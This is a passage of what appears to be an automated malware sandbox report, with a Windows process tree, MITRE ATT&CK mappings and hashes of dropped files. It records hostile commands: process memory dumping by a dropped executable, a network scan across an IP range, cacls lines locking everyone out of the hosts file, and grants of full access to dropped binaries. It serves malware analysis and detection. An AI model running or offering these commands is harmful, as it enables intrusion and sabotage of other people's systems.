C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 4048 C:\Windows\TEMP\mqgbuygyl\4048.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 4012 C:\Windows\TEMP\mqgbuygyl\4012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3308 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 4388 C:\Windows\TEMP\mqgbuygyl\4388.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:372 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3116 C:\Windows\TEMP\mqgbuygyl\3116.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3396 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3288 C:\Windows\TEMP\mqgbuygyl\3288.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1632 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2152 C:\Windows\TEMP\mqgbuygyl\2152.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\mqgbuygyl\thanliysa\scan.bat2⤵PID:692
-
C:\Windows\mqgbuygyl\thanliysa\llnysaisr.exellnysaisr.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1072 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 692 C:\Windows\TEMP\mqgbuygyl\692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5384 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2892 C:\Windows\TEMP\mqgbuygyl\2892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3880 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:1544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4504
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4676
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4036
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1888
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:564
-
C:\Windows\SysWOW64\hmhriy.exeC:\Windows\SysWOW64\hmhriy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3384
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F1⤵PID:3004
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1536
-
C:\Windows\system32\cacls.execacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F2⤵PID:4880
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tlmneit.exe1⤵PID:3936
-
C:\Windows\ime\tlmneit.exeC:\Windows\ime\tlmneit.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:440
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F1⤵PID:4164
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2420
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F2⤵PID:712
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tlmneit.exe1⤵PID:4484
-
C:\Windows\ime\tlmneit.exeC:\Windows\ime\tlmneit.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5544
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F1⤵PID:4268
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5572
-
C:\Windows\system32\cacls.execacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F2⤵PID:5128
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F1⤵PID:1120
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5576
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F2⤵PID:2688
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.2MB
MD5ace786572753a8e4c91f03932bd6f623
SHA138f797a77d5cefa85e816214bcdb15d8885889eb
SHA25608fa123da49a0f13ff8b8d4bbec639fc34e6748d51f1718c485d73fce0dabe8a
SHA512b1837dae056d7c640223901bf71f7237016fec22797ddefc77955a639635ff3bea7e019cb27551e7f38d7ff523ffcf251559db03871f33480767d01f8e86bb37
-
Filesize
3.9MB
MD56e67907df91260f62641158da01dc569
SHA164d2834996376eb871159de085bcbd983b8334e2
SHA256147c50c00348816b7e422e4e91e5e236ed7637b9f4d5e55f6c722b63d7d8eb8f
SHA512de4fbd647afea3fe5ed4a24976d19f6bee77fea7a936cc0a3e9c42144cbfe30a9966d81e5d3f7faec2a20057ac6a10127f61a368853373fb02cb574ac2a918fc
-
Filesize
2.9MB
MD5a6d7cc9a20cb815104ceba96f1cbc539
SHA175f422a5489a77a9fb078b9c75c941f12f170666
SHA25658e92ff0220a7226c5ce1bd6e978cd0c8b3a173d514aad7e335b677917ab56cc
SHA512e928dca68832bf5fab9a204b87935c57ea2629614648ae966e0cfcf63133cd1c04b6a20c735d5fffb165765a184f1d5eba22a6eee6e3d86a8b3df5dba9fb004f
-
Filesize
7.5MB
MD527e2353b362d7912cfc6c7d1702a6995
SHA191c35d285950cc5d1aa5fa03bca3fbe384175731
SHA2561139d60ef7ccf14288e7cfb64ef7fbd673728543679d21d0ec0c92e5e6bdf47f
SHA5126d00b0aa66fa132e5653e4848d6f32d304d5ca3a5bfd9c9a67c1db4a98bd9d1f100a95346bce3d1174d137066262bc827353ba6f5c8d33d013dd69efc4cb816a
-
Filesize
8.9MB
MD5e097a9e2751b70f73edaad319fd8f6e9
SHA1c4647f0ee577dac894985dc21d357a9cced696ed
SHA256cad0e91136fd9c7c014ec02478719b4b1723f9bd22143f4bed3952d27dda0099
SHA5120c8fa2c8d83fa06bf646dfe443cdb9ad60218805521614a5503eabd50000b035c31b229135dc8787f04111b35021777c54bb5af82e60f9b586dbb30657ce9671
-
Filesize
810KB
MD507cbae8ab1c42a9faf7487e81aa834c5
SHA1d00e95eae0111713b8bd8f6e8f375989498cc3b5
SHA256e859a32aad811964b492af67f78ea0ed940ad641ecac31cb3b44ba5c66be1ae2
SHA5125be14bb3849c2c8840a7d3a6345b54acb792062c1d80b4bfc6fd7bede11a6de0a14127ec87d20ad49d26a65c58a44925dac7fca7108aaca3475aa9799943121f
-
Filesize
2.4MB
MD5fc45d62adeb291cf81b7d03e63151710
SHA15c7add9a3633b173604f65aa84a7a5427d0d1e8f
SHA2563ac6fac3c7a235a5e2a7150c9bfedd0e6a71c9dabec1cfbe129237704216aa4e
SHA5127dd4c5e7d3932dbc463c5d17ed5dee879b9058e9db687208e2c6b83a75ef4950219c51a34ace3fffd35cefa52af34c209cc33fa86cd4ba11b2734e308c2314c6
-
Filesize
20.6MB
MD59a5891c9215d0c629f205660084d1d88
SHA13bdbae7756721aabb49d6aae982b9965a69f1ec5
SHA256d10e0fb04d4b3e883a9f72b8d91deb7a96db3ad4f3de25beeb224fc04db7ab59
SHA512d6e9e1a870b4ad8ba4b41a3d99ce5de784386688c99cb913bdb90c8068a75c5d3e9f3089871c8833d33016d367e399d3d91a48578062069b22df80622cfc8f6b
-
Filesize
33.2MB
MD57d0a57e8f73689434af92b1c95010cab
SHA15d510f810cdefdbbe17a9a3f37da4b85cc96f7c4
SHA256c3bd8c268ba172ba4ece47611e1e3cab96a484b817c763d7e5b380002d9af9bb
SHA5120ba2e9855636bff7065e0f51dadb801747f796c88703c9d580221e3e02ba33199f9ed226553770c19c64fa96e8014d69a341739de0b1fdd1815b853e3d2ef0a4
-
Filesize
4.3MB
MD5abe3b9b71c906442fa924cbb62e3b85d
SHA1ee1eff93e1e4e18fe37179324410c4ab752804d6
SHA256b23157f65b1b4c98a7179be4483eb50a3d52dad797fbee5b9e030bb644c6b257
SHA51220c8a7c0be3f7420b6d8f5dece6709024041dd110de821ef60d5c0690111241e9de2f44bc69dba8b56529428764e6cfd0f7c0836a6366cce3f5292d75d9b870d
-
Filesize
1.2MB
MD5937878bd85145cb2ecf12ffd46fd4c42
SHA1af27e6f9672b17d1dd59d250ab819fa7f2eace41
SHA2561d911738888851f2d1dbba942e089ec72fb5ece52e4d7463b4277484f5ac03a1
SHA512a846a88b235dfacb725adbee0212c211105de10cabe28ef0b8a9d0a7fdd7ac94a9bbd54027d9663aed211fb66ec5ca1fb69eb0798c0402e18d4445d762a51b97
-
Filesize
44.8MB
MD5d63e81f018530d6534473c1ad732eb6e
SHA153ca0e5bed7ca7a24093d7b6d55e7dca042bcd82
SHA256d0882e3a54dea629f070e0264fba1b2e2944c6d0a737d946a8851c4985b73963
SHA5121152341f54622104a7e74548ce2c2bf8b5a720d7372e4395e7c3bd9bdf087283298d69a7f813e08bac5ff87a9cb1fd24b0dcbdd1a46fa1a71c65f16090bfa1af
-
Filesize
26.3MB
MD5f210b5654eb92848ccfb7b1978fcfb23
SHA1d6ed520e9a12ec0437e456d4a809177ee921fe31
SHA25670a3c93049955af0c10be69bd2b8ddf9c840953540906dd42d2b1c6f7ae9b508
SHA512f4afc4ce2bbe530617660824e79dc4f3df545d5412643c6d614569081871cea01baafdcf68d8586c39a55dad18d93a5a9889ba8f99888eb8fdcc0d3279e1c2cc
-
Filesize
1.9MB
MD564da852c0b7b5c782c7d753941395a3b
SHA164e48d90326b0a27e5bde1f5831b428648cc4e8e
SHA25609f74fa4d1e53a14f1073857c9ca7e6de318338373f8fad9d1f52e38eec0f05e
SHA5125de37bb6df9f9e5f76813e3c31281d3e18802f3e844a88f8b72e3521449f0b55e40630b95eb2a9e6c558d60188e78e41b2cd6318219508484ec227fb16f72b54
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
11.0MB
MD53e44c74137ef4a9add03a0f5572f5c9f
SHA1c5e0559d339b4bee5e8c21e08004d942043e1aeb
SHA256e93025298d2393f09401a8cdc405bf7f269288f971f8e0f2c301d2fae96c1d33
SHA512cef3c31c545d3e37f981f5fc029315289cd9ce9e408b150f303610d4c0cdaf9309003fb46d7ddd371051c6e7cdfd9b0306b29596e35416081f7af303e73f36df
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376